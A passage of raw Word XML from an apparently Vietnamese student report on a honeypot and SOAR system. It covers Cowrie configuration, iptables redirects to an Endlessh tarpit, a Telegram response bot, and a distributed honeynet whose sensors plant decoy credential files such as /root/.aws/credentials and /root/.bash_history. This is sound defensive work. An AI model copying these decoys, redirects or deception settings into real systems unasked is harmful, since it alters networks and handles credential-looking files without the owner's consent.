    <w:p w14:paraId="172DCEE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Động cơ Giam lỏng Tarpit (Connection Tarpitting Engine): Khi phát hiện kẻ tấn công là một botnet quét tự động, thay vì ngắt kết nối (khiến botnet chuyển sang quét mục tiêu khác), SOAR Enforcer sử dụng cơ chế NAT chuyển hướng gói tin: 'iptables -t nat -A PREROUTING -p tcp -s &lt;IP&gt; --dport 2222 -j REDIRECT --to-ports 22222'. Tại cổng 22222, dịch vụ Endlessh Tarpit sẽ giam giữ kết nối của kẻ tấn công bằng cách truyền từng byte dữ liệu banner cách nhau 10 giây, khóa cứng tiến trình của hacker và làm kiệt quệ tài nguyên máy tấn công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5367E0E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Xuất bản Danh sách đen Đe dọa (Threat Feed Export): Mọi địa chỉ IP bị chặn đều được tự động đồng bộ ra tệp tin chuẩn 'data/threat_intel_feed.txt' để chia sẻ cho các hệ thống tường lửa biên khác trong mạng nội bộ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532C5F27"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3.8 Thiết kế Giao diện Giám sát &amp; Điều khiển Tương tác 2 Chiều (Telegram SOAR Bot)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684B357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Một điểm nhấn quan trọng giúp đồ án vượt xa các ứng dụng gửi thông báo thông thường là thiết kế Telegram SOAR Bot tương tác 2 chiều (Bidirectional Interactive Bot):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284E9EA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Giao diện Cảnh báo Trực quan: Thay vì gửi văn bản thô, Bot xuất bản các Thẻ Cảnh báo (Incident Cards) định dạng HTML chuyên nghiệp với icon mức độ nguy hại, thông tin chi tiết về kẻ tấn công, mã kỹ thuật MITRE ATT&amp;CK và kết quả trinh sát nhanh.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2820C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Bàn phím Hành động Tức thì (Inline Keyboard Actions): Mỗi thông báo sự cố đều đi kèm một cụm 4 nút bấm tương tác:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7EB5D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[Trinh sát ngược OSINT]: Kích hoạt lệnh quét sâu và gửi lại báo cáo tình báo chi tiết về IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01136F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[Chặn Firewall tức thì]: Ra lệnh cho SOAR Enforcer khóa IP trên Tường lửa ngay lập tức.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B0D11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[Đưa vào Tarpit]: Điều hướng IP vào hố nhựa đường Tarpit để làm tiêu hao tài nguyên đối phương.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57530A0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[Mở khóa IP]: Giải phóng IP khỏi danh sách chặn nếu xác định đây là kết nối nhầm lẫn hợp lệ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B447D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Cơ chế này giúp chuyên viên SOC có thể điều hành tác chiến từ bất kỳ đâu thông qua điện thoại thông minh mà không cần phải mở máy tính và đăng nhập vào máy chủ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A35F89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7682C96A" wp14:editId="1275DF22">
            <wp:extent cx="5303520" cy="3447288"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17015869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303520" cy="3447288"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="138FD7F6"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3.4: Giao diện Thẻ cảnh báo và Bàn phím tương tác Inline Buttons của Telegram SOAR Bot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105CB6F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3.9 Thiết kế Kiến trúc Mạng Bẫy Mồi Phân tán (Distributed Honeynet Architecture)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE2BC0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môi trường hạ tầng mạng doanh nghiệp hiện đại hoặc mô hình điện toán đám mây lai (Hybrid Cloud), việc triển khai Honeypot đơn điểm (Single Honeypot Instance) bộc lộ hạn chế lớn về tầm nhìn chiến thuật (tactical visibility). Nếu chỉ đặt bẫy tại một địa chỉ IP duy nhất, hệ thống không thể giám sát được các kỹ thuật di chuyển ngang (Lateral Movement) hoặc hoạt động dò quét trinh sát phân tán (Cross-Subnet Probing). Nhằm khắc phục triệt để rào cản này, kiến trúc Honeynet Phân tán (Distributed Honeynet Architecture) được thiết kế và tích hợp trực tiếp vào nhân điều phối.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4853294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Mô hình bao gồm các thành phần cốt lõi được chuẩn hóa theo chuẩn kiến trúc mở:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3963B4D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Cụm Cảm biến Biên Đa phân vùng (Distributed Edge Sensor Nodes): Các tác tử cảm biến (Sensor Agents) được phân bổ tại các vị trí nhạy cảm trong hệ thống mạng, bao gồm phân vùng DMZ công khai, phân vùng Đám mây AWS VPC và phân vùng Mạng nội bộ Doanh nghiệp (Corporate LAN). Mỗi cảm biến được định danh duy nhất (node_id) và gán nhãn phân vùng mạng (subnet tag).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411D04A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2. Giao thức Truyền tin &amp; Xác thực Biên an toàn (Secure REST Ingestion Protocol): Toàn bộ dữ liệu nhật ký sự kiện và trạng thái sức khỏe từ các Cảm biến Biên được gửi về Máy chủ Thu thập Trung tâm (Collector Server) thông qua giao thức HTTPS REST API tại cổng 9090. Kênh giao tiếp được bảo vệ nghiêm ngặt bằng Header xác thực 'X-Honeynet-Token' với cơ chế so khớp băm an toàn </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>hmac.compare</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>digest(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>), ngăn chặn hoàn toàn nguy cơ giả mạo cảm biến (Sensor Spoofing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11485A2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Cơ chế Giám sát Sức khỏe &amp; Chống mất mát Dữ liệu (Heartbeat &amp; Resiliency): Các cảm biến duy trì nhịp tim (Heartbeat) định kỳ 30 giây gửi về Collector. Nếu một cảm biến mất kết nối quá thời gian quy định, hệ thống tự động ghi nhận trạng thái OFFLINE và gửi thông báo cảnh báo về SOC. Phía cảm biến hỗ trợ hàng đợi đệm (Event Buffer Queue) giúp lưu trữ tạm thời sự kiện khi mạng gián đoạn và tự động đồng bộ lại khi kết nối phục hồi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB6673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4. Thuật toán Tương quan Dò quét Xuyên Phân vùng (Cross-Subnet Probing Correlation): Khi một địa chỉ IP nguồn thực hiện dò quét hoặc tương tác với từ 2 phân vùng mạng khác nhau trở lên, Correlation Engine lập tức kích hoạt Luật tương quan đặc biệt 'ALT-DISTRIB' tương ứng với Kỹ thuật MITRE ATT&amp;CK T1046 (Network Service </w:t>
      </w:r>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Discovery: Distributed Multi-Node Scanning), tự động cộng dồn +35 điểm rủi ro và kích hoạt Playbook ngăn chặn đồng loạt trên toàn bộ các tường lửa biên.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A1E6B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4EFDE1B5" wp14:editId="7CC8CC18">
            <wp:extent cx="5669280" cy="3472434"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17015869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669280" cy="3472434"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="651DF158"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3.5: Sơ đồ Kiến trúc Mạng Bẫy Mồi Phân tán (Distributed Honeynet Cluster Architecture)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C0B381"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3.2: Danh mục Phân bổ Cảm biến Biên và Chiến lược Mồi nhử trong Cụm Honeynet Phân tán</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a7"/>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32C06D9E" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="23B3435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Mã Node Cảm biến</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2F2B348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Phân vùng Triển khai</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278AE34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Dải mạng Subnet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="163EED0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Dịch vụ Bẫy mồi Hoạt động</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0717AFD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Loại Mồi nhử Honeytoken</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="56B0021C" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1B3A22F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sensor-dmz-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="205B112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DMZ Public Web</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="60AEC9D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192.168.10.0/24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2C81CC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 SSH (Port 2222) + HTTP Canary (8080)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0A7F74C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/root/.bash_history, db_backup.sql</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="531B0C7B" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="394DC3C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sensor-cloud-aws-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="775BF6A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AWS Cloud VPC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1E11D38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10.0.1.0/24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2CEC0BA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Decoy SSH Shell + Fake Cloud Admin Portal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7687CEF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/root</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>/.aws</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>/credentials (AWS Canary IAM)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="0FEC9BF9" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4FBA9A2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sensor-internal-lan-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="44B9CC3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Corporate Internal LAN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="26DB932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172.16.0.0/16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="50A9E63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Decoy Lateral Port + Fake SMB File Share</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="20F2712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Active Directory Decoy Admin SPN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="03286405" w14:textId="77777777" w:rsidR="003C5386" w:rsidRPr="005B486F" w:rsidRDefault="003C5386">
      <w:pPr>
        <w:spacing w:before="80" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a8"/>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57BF6C99" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9403" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3F91CF03" w14:textId="77777777" w:rsidR="003C5386" w:rsidRPr="005B486F" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>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rPr>
              <w:t>📌 GHI CHÚ HỌC THUẬT: ĐỘT PHÁ CỦA MÔ HÌNH HONEYNET PHÂN TÁN TRONG TÁC CHIẾN ACTIVE DEFENSE &amp; SOAR:</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:iCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Kiến trúc Honeynet Phân tán cho phép hệ thống mở rộng từ mô hình bẫy mồi phòng thí nghiệm đơn lẻ thành mạng lưới cảm biến đan xen (Sensor Mesh) cấp doanh nghiệp. Điểm đột phá kỹ thuật nằm ở cơ chế tương quan Cross-Subnet: Kẻ tấn công cho dù sử dụng kỹ thuật trinh sát phân tán chậm (Slow-and-Low Scan) để lẩn tránh IDS/IPS truyền thống vẫn sẽ bị vạch trần ngay khi chạm vào 2 bẫy mồi ở các phân vùng mạng khác nhau.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="65B61780" w14:textId="77777777" w:rsidR="003C5386" w:rsidRPr="005B486F" w:rsidRDefault="003C5386">
      <w:pPr>
        <w:spacing w:before="40" w:after="80" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15B0754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4: HIỆN THỰC HÓA VÀ MÃ NGUỒN CÁC PHÂN HỆ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8ED35F"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4.1 Môi trường Triển khai và Cấu hình Tùy biến Cowrie Honeypot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4FA30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Hệ thống được triển khai trên nền tảng máy chủ Linux Ubuntu Server 22.04 LTS (64-bit). Nhằm biến Cowrie từ một máy bẫy mặc định dễ bị phát hiện thành một máy chủ sản xuất thực tế (Realistic Production Server), các cấu hình tùy biến chuyên sâu đã được thực hiện:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192F04C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Chuyển dịch Cổng Dịch vụ (Port Redirection): Cổng SSH thực tế dùng để quản trị máy chủ được đổi từ cổng 22 sang cổng bí mật 54322. Cổng mặc định 22 của hệ thống được chuyển hướng (NAT Port Forwarding) về cổng 2222 của Cowrie Honeypot bằng lệnh iptables:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a9"/>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2E364730" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9403" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3BD67AEA"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iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 2222</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7355D0A7"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Lệnh iptables chuyển hướng lưu lượng SSH từ cổng 22 sang cổng bẫy 2222</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E329D2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Cấu hình Tùy biến File 'cowrie.cfg': Thay đổi Hostname mặc định từ 'svr04' thành 'corp-db-master-01' và giả lập phiên bản OpenSSH chuẩn của Ubuntu (OpenSSH_8.9p1 Ubuntu-3ubuntu0.4) nhằm đánh lừa các công cụ quét chuyên nghiệp như Nmap OS detection:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="aa"/>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1F6E43A7" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9403" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="36C42FE5"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[honeypot]</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>hostname = corp-db-master-01</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>log_path = var/log/cowrie</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>download_path = var/lib/cowrie/downloads</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>contents_path = share/cowrie/contents</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>txtcmds_path = share/cowrie/txtcmds</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>[ssh]</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>enabled = true</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>listen_endpoints = tcp:</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>2222:interface</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>=0.0.0.0</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>version = SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.4</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>[output_json]</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>enabled = true</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
